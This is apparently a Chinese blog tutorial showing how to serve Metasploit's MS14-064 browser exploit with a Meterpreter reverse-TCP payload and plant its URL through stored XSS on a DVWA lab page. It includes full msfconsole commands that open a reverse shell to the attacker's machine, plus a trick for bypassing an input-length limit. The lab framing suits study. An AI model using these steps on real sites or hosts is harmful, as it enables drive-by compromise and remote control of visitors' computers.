XSS漏洞,通过XSS实现网页挂马
**今天讲下通过XSS实现网页挂马~*,目的是了解安全方面知识,提升生活网络中辨别度
原理:
实验分为两部分:
1、通过Kali linux,利用MS14_064漏洞,制作一个木马服务器。存在该漏洞的用户一旦通过浏览器访问木马服务器,会造成缓冲区溢出,攻击者可以直接获取用户的系统Shell。
2、将木马服务器的URL,插入到一个存在存储型XSS漏洞的正常web服务器中,一旦有人访问该服务器的挂马页面,而且该用户存在MS14_064漏洞,就会中招。
制作木马服务器:
1.概念说明
(1)MS14_064漏洞
MS代表MicroSoft,14_064指的是2014年的第64个漏洞。
该漏洞影响范围为Win95+IE3 – Win10+IE11全版本,造成被攻击主机缓冲区溢出,触发该漏洞需要客户端安装有power shell软件。
(2)MetaSploit Framework(MFS)
本次进行缓冲区溢出的工具主要是MetaSploit Framework,其中集成了各个平台上常见的溢出漏洞和利用代码,并且不断更新。
Kali linux 自带该工具,可直接使用。
MFS包含三个基本模块:
渗透攻击模块(exploit),用于实际发起渗透攻击;
辅助模块(auxiliary),执行扫描之类的动作;
攻击载荷模块(payload),目标系统被成功渗透后执行的代码,payload中的主要内容包括shellcode,一段获取shell的代码。
一般都是先使用渗透攻击模块exploit对目标系统进行渗透,渗透成功后执行攻击载荷模块payload。
2. MFS初始操作:
启动msf:root@kali:~# msfconsole
初始化数据库:msf5 > msfdb init
//数据库初始化后,msf查询速度会大幅提升
msf5 > db_status #查看MSF数据库连接状态 。
3.使用MS14_064漏洞
首先我们搜索一下MS14_064漏洞
msf5 > search MS14_064
调用这个exploit:msf5>use exploit/windows/browser/ms14_064_ole_code_execution
查看一下这个exploit需要配置的选项:
msf5 exploit(ms14_064_ole_code_execution) > show options
设置允许调用powershell:
msf5 exploit(ms14_064_ole_code_execution) > set AllowPowershellPrompt true
//该漏洞需要利用目标主机powershell功能
设置木马服务器IP(Kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set srvhost 192.168.211.134
设置调用的payload:
msf5 exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp
这里使用反弹连接payload,让靶机主动连接我们。使用reverse类型的好处在于,可以不用担心连接被靶机的防火墙阻断。
设置监听IP(kali IP):
msf5 exploit(ms14_064_ole_code_execution) > set lhost 192.168.211.134
再设置一下监听接口,靶机中招后会主动连接我们这个端口:
msf5 exploit(ms14_064_ole_code_execution) > set lport 4444
最后,输入exploit(或者run)开启攻击服务:
kali 的web服务已开启,并生成了一个URL:http://192.168.211.134:8080/Dyvk2r6MwyGc,一旦存在MS14_064漏洞的主机访问这个URL,就会被控制。
4.尝试控制靶机
我们使用一台Windows xp主机(192.168.211.171),通过浏览器访问http://192.168.211.134:8080/Dyvk2r6MwyGc
访问后,Kali 立刻提示已发送exploit至目标主机,并且打开了一个连接:
通过session -l 我们可以查看当前有会话的主机,id号为1:
使用 session -i +id号,我们就可以连上靶机
输入shell,成功取得靶机的shell:
下一步,我们就想办法,通过XSS将这个URL挂到一个web服务器上去,就不用我们亲自去传播这个木马了~
利用XSS网页挂马:
接下来我们就开始网页挂马吧~
首先我们的目标是一个存在存储型XSS漏洞的网页,看过我前面文章的小伙伴们应该知道,DVWA平台上就有专门给我们练习存储型XSS漏洞的页面,我们就通过这个网页来实践挂马。
将网页安全等级调整为low,插入如下js语句:
但是会发现网页有输入长度限制:
前端输入长度限制,利用火狐浏览器,查看源代码修改长度限制即可:
输入后顺利插入恶意js语句:
此时查看网页源代码,就能看到js脚本了:
最后,靶机通过浏览器访问这个挂马网页:
查看Kali,成功连接:
入侵成功~
payload 除了使用script标签以外,还有其他多种标签,如:
就这样吧
XSS漏洞,通过XSS实现网页挂马相关推荐
- url存在宽字节跨站漏洞_【XSS漏洞】XSS漏洞相关总结v1.0
点击上方"公众号" 可以订阅哦! Hello,各位小伙伴周五晚上好~ 终于到了XSS漏洞的完结篇啦~~ 感觉本公众号写的最多的就是XSS,现在可以告一段落了... 让我们来看看第一 ...
- 网页挂马防护市场探索
据调查表明百分之九十以上的病毒传播途径都是以网页***为主,其实网页***就是将***和网页结合在一起,打开网页的同时也会运行***.最初的网页***原理是利用IE 浏览器的ActiveX控件,运行网 ...
- Linux 网页挂马实验,网页挂马详细教程
网页挂马详细教程 网页挂马详细教程 其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了.. 下面我介绍5种方法 ...
- Web安全-检测-网页挂马
网马 网马的本质是一个特定的网页,这个网页包含了攻击者精心构造的恶意代码,这些恶意代码通过利用浏览器(包括控件.插件)的漏洞,加载并执行攻击者指定的恶意软件(通常是木马). 网站挂马是黑客植入木马的一 ...
- 金山毒霸四月安全趋势 继续关注网页挂马
根据三月所观察与收集到的数据,金山毒霸反病毒工程师对4月份的安全形式做出以下估计与提示: 提防木马下载器的再度爆发 整个3月份,病毒团伙的精力都放在制造网页挂马上,猫癣.死牛等传统的木马下载器几乎停止 ...
- 如何预防和检测网页挂马?
在网站优化设计当中,检测网页木马也是很重要的一项工作,目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.本文主要介绍网页挂马的种类.如何检测网页是否被挂马.如何清除网页 ...
- 学习记录03(网页挂马)
网页挂马 将木马程序上传到网站,使用木马生成器生成一个网马,放到网页空间,在添加代码使木马在网页打开时运行 1.常见的几种方式 将木马伪装成页面元素,木马被浏览器自动加载到本地 利用脚本运行的漏洞下载 ...
- 如何预防和检测网页挂马(转)
转自:http://lusongsong.com/reed/79.html 1:网页挂马的种类. 目前流行的网站被黑,是在相应的asp,htm,js等文件中,插入以js调用方式的.更详细的资料,请点击 ...
- 解析网页后门与网页挂马原理
网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的.Web服务器被攻克不算,还"城门失火殃及池鱼",网站的浏览者也不能幸免.这无论是对企业的信誉,还是对管理员的技术能力都是沉 ...
最新文章
- Tomcat 启动错误 org/eclipse/jdt/debug/core/JDIDebug...
- Placeholder in IE8 and older
- [C#.Net]判断文件是否被占用的两种方法
- 调试时碰到的错误syntax error, expect {, actual int, pos 1, json : 3
- 聊聊spring的ioc
- 利用Redis锁解决高并发问题
- 盘点企业更换邮件服务器原因
- hadoop运维之jobtracker无故停止服务
- VideoView播放视频会引起其它音乐播放器暂停问题解决
- 向Windows 日志管理器写入系统程序日志信息
- Java Socket聊天室
- 低通滤波器转带通滤波器公式由来_什么是-3dB截止频率?浅析滤波器原理、分类和滤波器优化!...
- 抖音直播视频下载保存到本地地瓜网络技术
- 从教女儿下棋谈启蒙教育
- 电子科大杨宁TCPIP协议原理(总结)
- 产生式系统Python PySide2的GUI界面
- 使用AhMyth入侵Android智能手机
- 在计算机术语中 英文cad是指,CAD中英语词汇及命令大全
- 图片文字怎么转换成文本?分享几个好方法
- excal怎么设置模板阈值